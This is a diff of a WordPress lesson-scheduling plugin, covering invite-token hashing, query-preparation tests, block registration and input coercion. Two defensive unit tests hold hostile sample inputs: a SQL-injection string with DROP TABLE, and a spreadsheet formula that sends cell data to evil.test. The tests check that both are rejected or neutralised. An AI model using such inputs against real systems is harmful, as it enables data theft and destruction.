* (wpdb rows, REST request params, superglobals). Each method narrows a mixed
* value with an explicit runtime check instead of a blind cast, so an
* unexpected shape degrades to a safe default rather than leaking garbage
* into typed code.
*/
final class Val {
/**
* Coerce to int; non-numeric values become 0.
*/
public static function int( mixed $value ): int {
return is_numeric( $value ) ? (int) $value : 0;
}
/**
* Coerce to int, preserving null (e.g. nullable DB columns).
*/
public static function intOrNull( mixed $value ): ?int {
return null === $value ? null : self::int( $value );
}
/**
* Coerce to float; non-numeric values become 0.0.
*/
public static function float( mixed $value ): float {
return is_numeric( $value ) ? (float) $value : 0.0;
}
/**
* Coerce to string; non-scalar values become ''.
*/
public static function string( mixed $value ): string {
if ( is_string( $value ) ) {
return $value;
}
return is_scalar( $value ) ? (string) $value : '';
}
/**
* Coerce to string, preserving null (e.g. nullable DB columns).
*/
public static function stringOrNull( mixed $value ): ?string {
return null === $value ? null : self::string( $value );
}
/**
* Coerce to bool using PHP truthiness (DB tinyint flags, option values).
*/
public static function bool( mixed $value ): bool {
return (bool) $value;
}
}
templates/admin/invites.php
+11 -5
View File
@@ -9,11 +9,19 @@ if (! defined('ABSPATH')) {
* @var list<\Unsupervised\Schedular\Auth\Invite> $pendingInvites
* @var int $registrationPageId
* @var string $registrationPageUrl
* @var string $newInviteUrl One-time registration link for a just-created invite.
*/
?>
<div class="wrap">
<h1><?php esc_html_e('Invites', 'unsupervised-schedular'); ?></h1>
<p class="description"><?php esc_html_e('Invite a student by email, then send them the registration link below. They complete signup and accept any required policies through the [us_student_register] page.', 'unsupervised-schedular'); ?></p>
<p class="description"><?php esc_html_e('Invite a student by email, then send them the registration link. They complete signup and accept any required policies through the [us_student_register] page.', 'unsupervised-schedular'); ?></p>
<?php if ($newInviteUrl !== '') : ?>
<div class="notice notice-success inline">
<p><?php esc_html_e('Invite created. Copy the registration link now — for security it is not stored and cannot be shown again. To re-send a lost link, revoke the invite and create a new one.', 'unsupervised-schedular'); ?></p>
<p><input type="text" class="large-text code" readonly value="<?php echo esc_attr($newInviteUrl); ?>" onclick="this.select()"></p>
</div>
<?php endif; ?>
<h2><?php esc_html_e('Registration Page', 'unsupervised-schedular'); ?></h2>
<form method="post">
@@ -67,15 +75,13 @@ if (! defined('ABSPATH')) {
<thead>
<tr>
<th><?php esc_html_e('Email', 'unsupervised-schedular'); ?></th>
<th><?php esc_html_e('Registration link', 'unsupervised-schedular'); ?></th>
<th><?php esc_html_e('Invited', 'unsupervised-schedular'); ?></th>
<th><?php esc_html_e('Actions', 'unsupervised-schedular'); ?></th>
</tr>
</thead>
<tbody>
<?php $linkBase = $registrationPageUrl !== '' ? $registrationPageUrl : home_url('/'); ?>
<?php $now = current_time('mysql'); ?>
<?php foreach ($pendingInvites as $invite) : ?>
<?php $link = esc_url(add_query_arg('us_invite', $invite->token, $linkBase)); ?>
<tr>
<td>
<?php echo esc_html($invite->email); ?>
@@ -84,7 +90,7 @@ if (! defined('ABSPATH')) {
<?php endif; ?>
</td>
<td>
<input type="text" class="large-text code" readonly value="<?php echo esc_attr($link); ?>" onclick="this.select()">
<?php echo esc_html((string) $invite->createdAt); ?>
</td>
<td>
<form method="post" style="display:inline;">
templates/frontend/register-page.php
+2 -1
View File
@@ -7,6 +7,7 @@ if (! defined('ABSPATH')) {
/**
* @var \Unsupervised\Schedular\Auth\Invite|null $invite
* @var string $token Raw invite token from the request (only its hash is stored).
* @var bool $canRegister
* @var bool $success
* @var string $error
@@ -25,7 +26,7 @@ if (! defined('ABSPATH')) {
<form method="post" action="">
<?php wp_nonce_field('us_student_register'); ?>
<input type="hidden" name="us_invite" value="<?php echo esc_attr($invite->token); ?>">
<input type="hidden" name="us_invite" value="<?php echo esc_attr($token); ?>">
<p>
<label for="us-reg-email"><?php esc_html_e('Email', 'unsupervised-schedular'); ?></label>
tests/Unit/Auth/InviteRepositoryTest.php
+3 -3
View File
@@ -48,7 +48,7 @@ class InviteRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/token = %s/'), 'tok123')
->with(Mockery::pattern('/token = %s/'), 'wp_us_invites', 'tok123')
->andReturn('SELECT ...');
$this->db->shouldReceive('get_row')->andReturn($this->row());
@@ -71,7 +71,7 @@ class InviteRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/email = %s AND status = %s/'), 'a@b.test', Invite::STATUS_PENDING)
->with(Mockery::pattern('/email = %s AND status = %s/'), 'wp_us_invites', 'a@b.test', Invite::STATUS_PENDING)
->andReturn('SELECT ...');
$this->db->shouldReceive('get_row')->andReturn($this->row());
@@ -83,7 +83,7 @@ class InviteRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/status = %s/'), Invite::STATUS_PENDING)
->with(Mockery::pattern('/status = %s/'), 'wp_us_invites', Invite::STATUS_PENDING)
->andReturn('SELECT ...');
$this->db->shouldReceive('get_results')->andReturn([$this->row()]);
tests/Unit/Auth/InviteTest.php
+10
View File
@@ -95,6 +95,16 @@ class InviteTest extends TestCase
self::assertFalse($invite->isAcceptable('2026-06-02 09:00:00'));
}
public function testHashTokenIsDeterministicSha256(): void
{
$hash = Invite::hashToken('raw-token');
self::assertSame(hash('sha256', 'raw-token'), $hash);
self::assertSame($hash, Invite::hashToken('raw-token'));
self::assertNotSame($hash, Invite::hashToken('other-token'));
self::assertSame(64, strlen($hash));
}
public function testToArrayContainsExpectedKeys(): void
{
$arr = (new Invite('a@b.test', 'tok', id: 1))->toArray();
tests/Unit/Availability/AvailabilityRepositoryTest.php
+8 -3
View File
@@ -147,11 +147,16 @@ class AvailabilityRepositoryTest extends TestCase
self::assertFalse($this->repo->delete(1));
}
public function testFindAvailableWithNoFiltersUsesNoParams(): void
public function testFindAvailableWithNoFiltersPreparesTableOnly(): void
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/WHERE is_booked = 0/'), ['wp_us_availability'])
->andReturn('SELECT ...');
$this->db->shouldReceive('get_results')
->once()
->with(Mockery::pattern('/WHERE is_booked = 0/'))
->with('SELECT ...')
->andReturn([]);
$result = $this->repo->findAvailable();
@@ -177,7 +182,7 @@ class AvailabilityRepositoryTest extends TestCase
->once()
->with(
Mockery::pattern('/offering_id = %d AND duration_minutes = %d/'),
Mockery::on(static fn (array $p): bool => $p === [8, 30])
Mockery::on(static fn (array $p): bool => $p === ['wp_us_availability', 8, 30])
)
->andReturn('SELECT ...');
tests/Unit/Availability/AvailabilitySlotTest.php
+20
View File
@@ -64,6 +64,26 @@ class AvailabilitySlotTest extends TestCase
self::assertTrue($slot->isBooked);
}
public function testNormalizeDateTimeAcceptsCanonicalAndDatetimeLocalForms(): void
{
self::assertSame('2026-04-01 09:00:00', AvailabilitySlot::normalizeDateTime('2026-04-01 09:00:00'));
self::assertSame('2026-04-01 09:00:00', AvailabilitySlot::normalizeDateTime('2026-04-01 09:00'));
self::assertSame('2026-04-01 09:00:00', AvailabilitySlot::normalizeDateTime('2026-04-01T09:00'));
self::assertSame('2026-04-01 09:00:30', AvailabilitySlot::normalizeDateTime('2026-04-01T09:00:30'));
}
public function testNormalizeDateTimeRejectsGarbageAndImpossibleDates(): void
{
self::assertNull(AvailabilitySlot::normalizeDateTime(''));
self::assertNull(AvailabilitySlot::normalizeDateTime('not a date'));
self::assertNull(AvailabilitySlot::normalizeDateTime('next tuesday'));
self::assertNull(AvailabilitySlot::normalizeDateTime('2026-04-01'));
self::assertNull(AvailabilitySlot::normalizeDateTime('2026-13-01 09:00:00'));
self::assertNull(AvailabilitySlot::normalizeDateTime('2026-02-30 09:00:00'));
self::assertNull(AvailabilitySlot::normalizeDateTime('2026-04-01 25:00:00'));
self::assertNull(AvailabilitySlot::normalizeDateTime("2026-04-01 09:00:00'); DROP TABLE x;--"));
}
public function testToArrayContainsExpectedKeys(): void
{
$slot = new AvailabilitySlot(1, '2026-04-01 09:00:00', '2026-04-01 10:00:00', 30, 8, false, null, 10);
tests/Unit/BlockPreviewTest.php
+57
View File
@@ -0,0 +1,57 @@
<?php
declare(strict_types=1);
namespace Unsupervised\Schedular\Tests\Unit;
use Brain\Monkey\Functions;
use Unsupervised\Schedular\BlockPreview;
class BlockPreviewTest extends TestCase
{
public function testBookingPreviewMirrorsTheLiveMarkup(): void
{
$html = BlockPreview::booking();
self::assertStringContainsString('id="us-booking-app"', $html);
self::assertStringContainsString('id="us-slot-list"', $html);
self::assertStringContainsString('class="us-day"', $html);
self::assertStringContainsString('class="us-slot"', $html);
self::assertStringContainsString('class="us-book-btn" disabled', $html);
self::assertStringContainsString('us-editor-note', $html);
}
public function testGroupClassesPreviewMirrorsTheLiveMarkup(): void
{
$html = BlockPreview::groupClasses();
self::assertStringContainsString('id="us-group-app"', $html);
self::assertStringContainsString('id="us-group-list"', $html);
self::assertStringContainsString('class="us-class"', $html);
self::assertStringContainsString('class="us-enrol-btn" disabled', $html);
self::assertStringContainsString('us-editor-note', $html);
}
public function testLoginPreviewIncludesTheRealLoginTemplate(): void
{
Functions\when('wp_nonce_field')->justReturn('');
$html = BlockPreview::login();
self::assertStringContainsString('class="us-login-form"', $html);
self::assertStringContainsString('name="log"', $html);
self::assertStringContainsString('name="pwd"', $html);
self::assertStringContainsString('us-editor-note', $html);
}
public function testRegistrationPreviewShowsADisabledSampleForm(): void
{
$html = BlockPreview::registration();
self::assertStringContainsString('class="us-register-form"', $html);
self::assertStringContainsString('id="us-reg-email"', $html);
self::assertStringContainsString('id="us-reg-name"', $html);
self::assertStringContainsString('id="us-reg-pass"', $html);
self::assertStringContainsString('disabled', $html);
self::assertStringContainsString('us-editor-note', $html);
}
}
tests/Unit/BlockRegistrarTest.php
+167
View File
@@ -0,0 +1,167 @@
<?php
declare(strict_types=1);
namespace Unsupervised\Schedular\Tests\Unit;
use Brain\Monkey\Actions;
use Brain\Monkey\Functions;
use Mockery;
use Unsupervised\Schedular\Auth\LoginPage;
use Unsupervised\Schedular\Auth\RegistrationPage;
use Unsupervised\Schedular\BlockRegistrar;
use Unsupervised\Schedular\Booking\BookingPage;
use Unsupervised\Schedular\GroupClass\GroupClassPage;
/**
* Test double exposing editor-preview mode as a switch, since the real
* detection relies on the REST_REQUEST constant which cannot be toggled
* within a single PHP process.
*/
class TestableBlockRegistrar extends BlockRegistrar
{
public bool $preview = false;
protected function isEditorPreview(): bool
{
return $this->preview;
}
}
class BlockRegistrarTest extends TestCase
{
private BookingPage&Mockery\MockInterface $bookingPage;
private LoginPage&Mockery\MockInterface $loginPage;
private RegistrationPage&Mockery\MockInterface $registrationPage;
private GroupClassPage&Mockery\MockInterface $groupClassPage;
private TestableBlockRegistrar $registrar;
protected function setUp(): void
{
parent::setUp();
$this->bookingPage = Mockery::mock(BookingPage::class);
$this->loginPage = Mockery::mock(LoginPage::class);
$this->registrationPage = Mockery::mock(RegistrationPage::class);
$this->groupClassPage = Mockery::mock(GroupClassPage::class);
$this->registrar = new TestableBlockRegistrar(
$this->bookingPage,
$this->loginPage,
$this->registrationPage,
$this->groupClassPage,
);
}
public function testRegisterHooksBlockRegistrationOntoInit(): void
{
Actions\expectAdded('init')->once()->with([$this->registrar, 'registerBlocks']);
$this->registrar->register();
}
public function testRegisterBlocksRegistersAllFourBlocksWithAssets(): void
{
Functions\expect('wp_register_script')
->once()
->with(
BlockRegistrar::SCRIPT_HANDLE,
Mockery::pattern('~assets/js/blocks\.js$~'),
Mockery::type('array'),
USC_VERSION,
true
);
Functions\when('wp_style_is')->justReturn(false);
Functions\expect('wp_register_style')
->once()
->with(
BlockRegistrar::STYLE_HANDLE,
Mockery::pattern('~assets/css/frontend\.css$~'),
[],
USC_VERSION
);
$registered = [];
Functions\when('register_block_type')->alias(
static function (string $name, array $args) use (&$registered): bool {
$registered[$name] = $args;
return true;
}
);
$this->registrar->registerBlocks();
self::assertSame(
[
'us-scheduler/booking',
'us-scheduler/student-login',
'us-scheduler/student-register',
'us-scheduler/group-classes',
],
array_keys($registered)
);
foreach ($registered as $args) {
self::assertSame(BlockRegistrar::SCRIPT_HANDLE, $args['editor_script']);
self::assertSame(BlockRegistrar::STYLE_HANDLE, $args['style']);
self::assertIsCallable($args['render_callback']);
}
}
public function testRegisterBlocksDoesNotReRegisterAnAlreadyRegisteredStyle(): void
{
Functions\when('wp_register_script')->justReturn(true);
Functions\when('wp_style_is')->justReturn(true);
Functions\expect('wp_register_style')->never();
Functions\when('register_block_type')->justReturn(true);
$this->registrar->registerBlocks();
}
public function testFrontEndRenderDelegatesToThePageObjects(): void
{
$this->registrar->preview = false;
$this->bookingPage->shouldReceive('render')->once()->with([])->andReturn('booking-html');
$this->loginPage->shouldReceive('render')->once()->with([])->andReturn('login-html');
$this->registrationPage->shouldReceive('render')->once()->with([])->andReturn('register-html');
$this->groupClassPage->shouldReceive('render')->once()->with([])->andReturn('group-html');
self::assertSame('booking-html', $this->registrar->renderBooking());
self::assertSame('login-html', $this->registrar->renderLogin());
self::assertSame('register-html', $this->registrar->renderRegistration());
self::assertSame('group-html', $this->registrar->renderGroupClasses());
}
public function testEditorPreviewRendersStaticMarkupWithoutTouchingThePages(): void
{
$this->registrar->preview = true;
Functions\when('wp_nonce_field')->justReturn('');
$this->bookingPage->shouldNotReceive('render');
$this->loginPage->shouldNotReceive('render');
$this->registrationPage->shouldNotReceive('render');
$this->groupClassPage->shouldNotReceive('render');
self::assertStringContainsString('us-booking-app', $this->registrar->renderBooking());
self::assertStringContainsString('us-login-form', $this->registrar->renderLogin());
self::assertStringContainsString('us-register-form', $this->registrar->renderRegistration());
self::assertStringContainsString('us-group-app', $this->registrar->renderGroupClasses());
}
public function testIsEditorPreviewIsFalseOutsideRestRequests(): void
{
// REST_REQUEST is undefined in the test process, so the real
// registrar must take the front-end path.
$registrar = new BlockRegistrar(
$this->bookingPage,
$this->loginPage,
$this->registrationPage,
$this->groupClassPage,
);
$this->bookingPage->shouldReceive('render')->once()->with([])->andReturn('live');
self::assertSame('live', $registrar->renderBooking());
}
}
tests/Unit/Booking/BookingRepositoryTest.php
+1 -1
View File
@@ -138,7 +138,7 @@ class BookingRepositoryTest extends TestCase
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/COUNT\(\*\).*l.student_id = %d.*a.start_dt >= %s/s'), 5, Lesson::STATUS_CANCELLED, '2026-06-08 12:00:00')
->with(Mockery::pattern('/COUNT\(\*\).*l.student_id = %d.*a.start_dt >= %s/s'), 'wp_us_lessons', 'wp_us_availability', 5, Lesson::STATUS_CANCELLED, '2026-06-08 12:00:00')
->andReturn('SELECT ...');
$this->db->shouldReceive('get_var')->andReturn('3');
tests/Unit/GroupClass/EnrollmentRepositoryTest.php
+3 -3
View File
@@ -48,7 +48,7 @@ class EnrollmentRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/COUNT\(\*\).*offering_id = %d AND status = %s/s'), 7, Enrollment::STATUS_ACTIVE)
->with(Mockery::pattern('/COUNT\(\*\).*offering_id = %d AND status = %s/s'), 'wp_us_group_enrollments', 7, Enrollment::STATUS_ACTIVE)
->andReturn('SELECT ...');
$this->db->shouldReceive('get_var')->andReturn('4');
@@ -60,7 +60,7 @@ class EnrollmentRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/student_id = %d AND status = %s/'), 5, Enrollment::STATUS_ACTIVE)
->with(Mockery::pattern('/student_id = %d AND status = %s/'), 'wp_us_group_enrollments', 5, Enrollment::STATUS_ACTIVE)
->andReturn('SELECT ...');
$this->db->shouldReceive('get_var')->andReturn('2');
@@ -72,7 +72,7 @@ class EnrollmentRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/offering_id = %d AND student_id = %d AND status = %s/'), 7, 5, Enrollment::STATUS_ACTIVE)
->with(Mockery::pattern('/offering_id = %d AND student_id = %d AND status = %s/'), 'wp_us_group_enrollments', 7, 5, Enrollment::STATUS_ACTIVE)
->andReturn('SELECT ...');
$this->db->shouldReceive('get_var')->andReturn('1');
tests/Unit/Offering/OfferingRepositoryTest.php
+9 -4
View File
@@ -109,11 +109,16 @@ class OfferingRepositoryTest extends TestCase
self::assertSame(3, $offering->instructorId);
}
public function testFindAllWithNoFiltersUsesNoParams(): void
public function testFindAllWithNoFiltersPreparesTableOnly(): void
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/WHERE 1 = 1/'), ['wp_us_offerings'])
->andReturn('SELECT ...');
$this->db->shouldReceive('get_results')
->once()
->with(Mockery::pattern('/WHERE 1 = 1/'))
->with('SELECT ...')
->andReturn([$this->sampleRow()]);
$offerings = $this->repo->findAll();
@@ -126,7 +131,7 @@ class OfferingRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/is_active = %d/'), Mockery::on(static fn (array $p): bool => $p === [1]))
->with(Mockery::pattern('/is_active = %d/'), Mockery::on(static fn (array $p): bool => $p === ['wp_us_offerings', 1]))
->andReturn('SELECT ...');
$this->db->shouldReceive('get_results')->andReturn([]);
@@ -140,7 +145,7 @@ class OfferingRepositoryTest extends TestCase
->once()
->with(
Mockery::pattern('/instructor_id = %d AND kind = %s/'),
Mockery::on(static fn (array $p): bool => $p === [3, Offering::KIND_GROUP_CLASS])
Mockery::on(static fn (array $p): bool => $p === ['wp_us_offerings', 3, Offering::KIND_GROUP_CLASS])
)
->andReturn('SELECT ...');
tests/Unit/Payment/PaymentReportTest.php
+18
View File
@@ -80,4 +80,22 @@ class PaymentReportTest extends TestCase
self::assertStringContainsString('"Ada ""The Great"""', $csv);
}
public function testCsvNeutralisesFormulaInjectionInNames(): void
{
$rows = $this->rows();
$rows[0]['student'] = '=HYPERLINK("https://evil.test/?"&A1,"total")';
$rows[0]['instructor'] = '@SUM(A1)';
$rows[1]['student'] = "+1+2";
$rows[1]['instructor'] = "\tcmd";
$csv = (new PaymentReport($rows))->toCsv();
self::assertStringContainsString('"\'=HYPERLINK(""https://evil.test/?""&A1,""total"")"', $csv);
self::assertStringContainsString('"\'@SUM(A1)"', $csv);
self::assertStringContainsString('"\'+1+2"', $csv);
self::assertStringContainsString("\"'\tcmd\"", $csv);
// Safe fields are untouched.
self::assertStringContainsString('"2026-06-02"', $csv);
self::assertStringContainsString('"100.00"', $csv);
}
}
tests/Unit/Payment/PaymentRepositoryTest.php
+6 -6
View File
@@ -66,7 +66,7 @@ class PaymentRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/tax_amount = ROUND\( amount \* %f \/ 100, 2 \)/'), 13.0, 13.0, 50)
->with(Mockery::pattern('/tax_amount = ROUND\( amount \* %f \/ 100, 2 \)/'), 'wp_us_payments', 13.0, 13.0, 50)
->andReturn('UPDATE ...');
$this->db->shouldReceive('query')->once()->with('UPDATE ...')->andReturn(1);
@@ -78,7 +78,7 @@ class PaymentRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/status = %s AND paid_at >= %s AND paid_at < %s AND instructor_id = %d/'), ['paid', '2026-06-01 00:00:00', '2026-07-01 00:00:00', 3])
->with(Mockery::pattern('/status = %s AND paid_at >= %s AND paid_at < %s AND instructor_id = %d/'), ['wp_us_payments', 'paid', '2026-06-01 00:00:00', '2026-07-01 00:00:00', 3])
->andReturn('SELECT ...');
$this->db->shouldReceive('get_results')->andReturn([$this->row()]);
@@ -90,7 +90,7 @@ class PaymentRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::on(static fn (string $sql): bool => ! str_contains($sql, 'instructor_id')), ['paid', '2026-06-01 00:00:00', '2026-07-01 00:00:00'])
->with(Mockery::on(static fn (string $sql): bool => ! str_contains($sql, 'instructor_id')), ['wp_us_payments', 'paid', '2026-06-01 00:00:00', '2026-07-01 00:00:00'])
->andReturn('SELECT ...');
$this->db->shouldReceive('get_results')->andReturn([]);
@@ -118,7 +118,7 @@ class PaymentRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/stripe_payment_intent_id = %s/'), 'pi_123')
->with(Mockery::pattern('/stripe_payment_intent_id = %s/'), 'wp_us_payments', 'pi_123')
->andReturn('SELECT ...');
$this->db->shouldReceive('get_row')->andReturn($this->row());
@@ -138,7 +138,7 @@ class PaymentRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/registration_type = %s AND registration_id = %d/'), Payment::REG_LESSON, 12)
->with(Mockery::pattern('/registration_type = %s AND registration_id = %d/'), 'wp_us_payments', Payment::REG_LESSON, 12)
->andReturn('SELECT ...');
$this->db->shouldReceive('get_row')->andReturn($this->row());
@@ -150,7 +150,7 @@ class PaymentRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/status = %s/'), Payment::STATUS_PENDING)
->with(Mockery::pattern('/status = %s/'), 'wp_us_payments', Payment::STATUS_PENDING)
->andReturn('SELECT ...');
$this->db->shouldReceive('get_results')->andReturn([$this->row()]);
tests/Unit/Policy/AcceptanceRepositoryTest.php
+1 -1
View File
@@ -70,7 +70,7 @@ class AcceptanceRepositoryTest extends TestCase
{
$this->db->shouldReceive('prepare')
->once()
->with(Mockery::pattern('/registration_type = %s AND registration_id = %d/'), PolicyAcceptance::REG_LESSON, 12)
->with(Mockery::pattern('/registration_type = %s AND registration_id = %d/'), 'wp_us_policy_acceptances', PolicyAcceptance::REG_LESSON, 12)
->andReturn('SELECT ...');
$this->db->shouldReceive('get_results')->andReturn([
tests/Unit/Policy/PolicyRepositoryTest.php
+1
View File
@@ -45,6 +45,7 @@ class PolicyRepositoryTest extends TestCase
->once()
->with(
Mockery::pattern('/acceptance_scope = %s OR acceptance_scope = %s/'),
'wp_us_policies',
Policy::SCOPE_SIGNUP,
Policy::SCOPE_BOTH
)
tests/Unit/Registration/AnswerRepositoryTest.php
+1
View File
@@ -84,6 +84,7 @@ class AnswerRepositoryTest extends TestCase
->once()
->with(
Mockery::pattern('/registration_type = %s AND registration_id = %d/'),
'wp_us_question_answers',
Answer::REG_LESSON,
12
)
tests/Unit/Registration/QuestionRepositoryTest.php
+1 -1
View File
@@ -101,7 +101,7 @@ class QuestionRepositoryTest extends TestCase
->once()
->with(
Mockery::pattern('/offering_id = %d AND is_active = %d/'),
Mockery::on(static fn (array $p): bool => $p === [7, 1])
Mockery::on(static fn (array $p): bool => $p === ['wp_us_questions', 7, 1])
)
->andReturn('SELECT ...');
tests/Unit/ValTest.php
+66
View File
@@ -0,0 +1,66 @@
<?php
declare(strict_types=1);
namespace Unsupervised\Schedular\Tests\Unit;
use Unsupervised\Schedular\Val;
class ValTest extends TestCase
{
public function testIntCoercesNumericValues(): void
{
self::assertSame(5, Val::int('5'));
self::assertSame(5, Val::int(5));
self::assertSame(5, Val::int(5.7));
self::assertSame(-3, Val::int('-3'));
}
public function testIntFallsBackToZeroForNonNumeric(): void
{
self::assertSame(0, Val::int('abc'));
self::assertSame(0, Val::int(null));
self::assertSame(0, Val::int([]));
self::assertSame(0, Val::int(new \stdClass()));
}
public function testIntOrNullPreservesNull(): void
{
self::assertNull(Val::intOrNull(null));
self::assertSame(7, Val::intOrNull('7'));
self::assertSame(0, Val::intOrNull('abc'));
}
public function testFloatCoercesNumericValues(): void
{
self::assertSame(12.5, Val::float('12.5'));
self::assertSame(12.0, Val::float(12));
self::assertSame(0.0, Val::float('abc'));
self::assertSame(0.0, Val::float(null));
}
public function testStringCoercesScalars(): void
{
self::assertSame('hello', Val::string('hello'));
self::assertSame('5', Val::string(5));
self::assertSame('1', Val::string(true));
self::assertSame('', Val::string(null));
self::assertSame('', Val::string([]));
self::assertSame('', Val::string(new \stdClass()));
}
public function testStringOrNullPreservesNull(): void
{
self::assertNull(Val::stringOrNull(null));
self::assertSame('x', Val::stringOrNull('x'));
self::assertSame('', Val::stringOrNull([]));
}
public function testBoolUsesTruthiness(): void
{
self::assertTrue(Val::bool('1'));
self::assertTrue(Val::bool(1));
self::assertFalse(Val::bool('0'));
self::assertFalse(Val::bool(''));
self::assertFalse(Val::bool(null));
}
}
unsupervised-schedular.php
+1 -1
View File
@@ -4,7 +4,7 @@
* Plugin URI: https://unsupervised.ca
* Description: Instructor/student lesson scheduling for WordPress.
* Version: 1.0.0-rc.1
* Requires at least: 6.0
* Requires at least: 6.2
* Requires PHP: 8.1
* Author: Unsupervised
* License: GPL-2.0-or-later